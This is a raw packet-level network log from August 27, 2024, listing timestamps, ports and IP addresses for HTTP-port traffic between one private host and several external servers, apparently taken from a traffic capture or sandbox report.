Aug 27, 2024 17:45:52.737190962 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.737226009 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.737237930 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.737308025 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.737329006 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.737425089 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.737433910 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.737477064 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.737581015 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.737592936 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.737698078 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.737788916 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.737867117 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.737919092 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.737971067 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.738114119 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.738218069 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.738229036 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.738293886 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.738420963 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.738451958 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.738475084 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.738487005 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.738555908 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.738647938 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.738672018 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.738724947 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.738830090 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.738881111 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.739020109 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.739130020 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.739171982 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.739270926 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.739288092 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.739300013 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.739506006 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.739507914 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.739648104 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.739689112 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.739795923 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.739809036 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.739830971 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.739921093 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.739969969 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.740024090 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.740036011 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.740180969 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.740287066 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.740298986 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.740468025 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.740504980 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.740629911 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.740636110 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.740804911 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.868350983 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.868444920 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.868539095 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.868587971 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.868602037 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.868628025 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.868657112 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.868797064 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.868850946 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.868864059 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.868911982 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.869024992 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.869082928 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.869196892 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.869404078 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.869587898 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.869640112 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.869738102 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.869818926 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.869844913 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.869929075 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.869940996 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.869941950 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.870138884 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.870138884 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.870265007 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.870307922 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.870412111 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.870480061 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.870517969 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.870570898 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.870673895 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.870675087 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.870685101 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.870783091 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.870794058 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.870805979 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.870868921 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.870893002 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.870939016 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.871001005 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.871130943 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.871136904 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.871262074 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.871273994 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.871315002 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.871387005 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.871480942 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.871514082 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.871531010 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.871566057 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.871611118 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.871684074 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.871783018 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.871833086 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.871923923 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.871934891 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.871947050 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.872041941 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.872054100 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.872153997 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.872165918 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.872184992 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.872299910 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.872392893 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.872400999 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.872585058 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.872771978 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.872895002 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.872951031 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.873054028 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.873059988 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.873071909 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.873167992 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.873250008 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.873270988 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.873325109 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.873339891 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.873442888 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.873442888 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.873455048 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.873536110 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.873550892 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.873563051 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.873588085 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.873652935 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.873658895 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.873744011 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.873776913 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.873823881 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.873861074 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.873893976 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.873925924 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.874030113 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.874066114 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874077082 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874092102 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874157906 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874250889 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.874273062 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874303102 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.874330044 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874341965 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874352932 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874407053 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.874449968 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874460936 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874521017 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874536991 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.874576092 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874588966 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.874680042 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.874680996 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874692917 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874792099 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874803066 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874861956 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.874893904 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.874911070 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.874991894 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.875024080 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.875070095 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.875180006 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.875200033 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.875298977 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.875317097 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.875418901 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.875431061 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.875439882 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:52.875499010 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:52.875590086 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:45:57.745621920 CEST	80	49806	23.111.141.202	192.168.11.20
Aug 27, 2024 17:45:57.745942116 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:46:15.896316051 CEST	49806	80	192.168.11.20	23.111.141.202
Aug 27, 2024 17:46:30.152175903 CEST	49807	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:46:30.453689098 CEST	80	49807	154.23.184.218	192.168.11.20
Aug 27, 2024 17:46:30.453866959 CEST	49807	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:46:30.460151911 CEST	49807	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:46:30.761688948 CEST	80	49807	154.23.184.218	192.168.11.20
Aug 27, 2024 17:46:30.761910915 CEST	80	49807	154.23.184.218	192.168.11.20
Aug 27, 2024 17:46:30.762151957 CEST	49807	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:46:30.764998913 CEST	49807	80	192.168.11.20	154.23.184.218
Aug 27, 2024 17:46:31.066409111 CEST	80	49807	154.23.184.218	192.168.11.20
Aug 27, 2024 17:46:51.005475044 CEST	49808	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:51.107215881 CEST	80	49808	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:51.107536077 CEST	49808	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:51.116849899 CEST	49808	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:51.218322992 CEST	80	49808	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:51.219928026 CEST	80	49808	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:51.220148087 CEST	49808	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:52.624102116 CEST	49808	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:52.725323915 CEST	80	49808	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:53.641864061 CEST	49809	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:53.743326902 CEST	80	49809	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:53.743549109 CEST	49809	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:53.751492023 CEST	49809	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:53.852788925 CEST	80	49809	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:53.854660988 CEST	80	49809	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:53.854859114 CEST	49809	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:55.264220953 CEST	49809	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:55.365356922 CEST	80	49809	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.281827927 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.382597923 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.382806063 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.391618013 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.391752005 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.492432117 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.492542982 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.492655039 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.492734909 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.492772102 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.492774010 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.492786884 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.492819071 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.492856979 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.492866039 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.492991924 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.493010044 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.493146896 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.493155956 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.493161917 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.493329048 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.493531942 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.494613886 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.495021105 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.593735933 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.593816996 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.593889952 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.593945026 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.594011068 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.594078064 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.594110012 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.594175100 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.594245911 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.594257116 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.594332933 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.594374895 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.594420910 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:56.594481945 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.594546080 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.594619036 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.594679117 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.594741106 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.594785929 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.594991922 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.595040083 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.595079899 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.595118999 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.595159054 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.695566893 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.695754051 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.695823908 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.696003914 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.696037054 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.696067095 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.696086884 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.696204901 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.696372986 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.696451902 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.696474075 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:56.696635962 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:57.904290915 CEST	49810	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:58.005050898 CEST	80	49810	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:58.921868086 CEST	49811	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:59.023089886 CEST	80	49811	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:59.023520947 CEST	49811	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:59.029607058 CEST	49811	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:59.130608082 CEST	80	49811	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:59.134354115 CEST	80	49811	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:59.134421110 CEST	80	49811	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:59.134782076 CEST	49811	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:59.136724949 CEST	49811	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:59.140681982 CEST	80	49811	76.223.67.189	192.168.11.20
Aug 27, 2024 17:46:59.140855074 CEST	49811	80	192.168.11.20	76.223.67.189
Aug 27, 2024 17:46:59.238187075 CEST	80	49811	76.223.67.189	192.168.11.20
Aug 27, 2024 17:47:04.329796076 CEST	49812	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:04.494834900 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.495079994 CEST	49812	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:04.502994061 CEST	49812	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:04.668010950 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.678139925 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.678248882 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.678263903 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.678479910 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.678519011 CEST	49812	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:04.678580999 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.678689003 CEST	49812	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:04.678716898 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.678832054 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.678900003 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.678982973 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.678996086 CEST	49812	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:04.679167032 CEST	49812	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:04.679176092 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.679336071 CEST	49812	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:04.844007969 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.844090939 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.844204903 CEST	80	49812	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:04.844388008 CEST	49812	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:04.844388008 CEST	49812	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:06.011877060 CEST	49812	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:07.029437065 CEST	49813	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:07.196439981 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.196657896 CEST	49813	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:07.204485893 CEST	49813	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:07.372793913 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.385747910 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.385869026 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.385884047 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.386014938 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.386106968 CEST	49813	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:07.386125088 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.386140108 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.386253119 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.386276007 CEST	49813	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:07.386360884 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.386445999 CEST	49813	80	192.168.11.20	203.161.42.73
Aug 27, 2024 17:47:07.386451006 CEST	80	49813	203.161.42.73	192.168.11.20
Aug 27, 2024 17:47:07.386574030 CEST	80	49813	203.161.42.73	192.168.11.20
